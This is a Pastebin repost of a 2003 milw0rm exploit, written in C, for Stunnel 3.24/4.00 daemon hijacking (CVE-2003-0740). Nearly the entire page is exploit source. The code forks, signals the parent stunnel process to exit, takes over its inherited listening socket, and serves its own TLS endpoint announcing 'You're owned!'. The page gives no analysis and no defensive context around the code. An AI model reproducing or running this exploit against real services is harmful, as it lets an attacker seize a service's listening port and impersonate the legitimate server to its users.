FlyFar

Stunnel 3.24/4.00 - Daemon Hijacking - CVE-2003-0740

Mar 1st, 2024
98
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
C 2.34 KB | Cybersecurity | 0 0
  1. #define LISTEN_DESCRIPTOR 6
  2. #define CERTF "/opt/stunnel-sploit/foo-cert.pem"
  3. #define KEYF  "/opt/stunnel-sploit/foo-cert.pem"
  4.  
  5. static SSL_CTX    *ctx;
  6. static SSL        *ssl;
  7. static X509       *client_cert;
  8. static SSL_METHOD *meth;
  9.  
  10. static void server_loop(int descr);
  11. static void ssl_init(void);
  12.  
  13. int main(int argc, char *argv[])
  14. {
  15.     int pid = getppid();
  16.  
  17.     /* Need to fork so stunnel doesn't kill us */
  18.     if (fork() == 0) {
  19.         /* Become session leader */
  20.         setsid();
  21.  
  22.         /* Goodbye - thanks for the descriptor */
  23.         kill(pid, SIGUSR2);
  24.         close(0); close(1); close(2);
  25.         ssl_init();
  26.         server_loop(LISTEN_DESCRIPTOR);
  27.     }
  28.     return 0;
  29. }
  30.  
  31. static void server_loop(int descr)
  32. {
  33.     struct timeval   tv;
  34.     fd_set read_mask ;
  35.  
  36.     FD_SET(descr, &read_mask);
  37.     for (;;) {
  38.         struct sockaddr_in remote;
  39.         socklen_t len = sizeof(remote);
  40.         int fd;
  41.  
  42.         if (select(descr+1, &read_mask, NULL, NULL, 0 )
  43. == -1)
  44.             continue;
  45.         fd = accept(descr, &remote, &len);
  46.         if (fd >=0) {
  47.             char obuf[4096];
  48.  
  49.             if ((ssl = SSL_new (ctx)) != NULL) {
  50.                 SSL_set_fd (ssl, fd);
  51.                 SSL_set_accept_state(ssl);
  52.                 if ((SSL_accept (ssl)) == -1)
  53.                     exit(1);
  54.                 strcpy(obuf, "HTTP/1.0 200 OK\n");
  55.                 strcat(obuf, "Content-Length: 40\n");
  56.                 strcat(obuf, "Content-Type:
  57. text/html\n\n");
  58.                 strcat(obuf, "<html><body>You're
  59. owned!</body></html>");
  60.                 SSL_write (ssl, obuf, strlen(obuf));
  61.                 SSL_set_shutdown(ssl,
  62. SSL_SENT_SHUTDOWN|SSL_RECEIVED_SHUTDOWN);
  63.                 SSL_free (ssl);
  64.                 ERR_remove_state(0);
  65.             }
  66.             close(fd);
  67.         }
  68.     }
  69.     SSL_CTX_free (ctx);  /* Never gets called */
  70. }
  71.  
  72. static void ssl_init(void)
  73. {
  74.     SSL_load_error_strings();
  75.     SSLeay_add_ssl_algorithms();
  76.     meth = SSLv23_server_method();
  77.     ctx = SSL_CTX_new (meth);
  78.     if (!ctx)
  79.         exit(1);
  80.     if (SSL_CTX_use_certificate_file(ctx, CERTF,
  81. SSL_FILETYPE_PEM) <= 0)
  82.         exit(1);
  83.     if (SSL_CTX_use_PrivateKey_file(ctx, KEYF,
  84. SSL_FILETYPE_PEM) <= 0)
  85.         exit(1);
  86.     if (!SSL_CTX_check_private_key(ctx))
  87.         exit(1);
  88. }
  89.  
  90.  
  91. // milw0rm.com [2003-09-05]
  92.            
Add Comment
Please, Sign In to add comment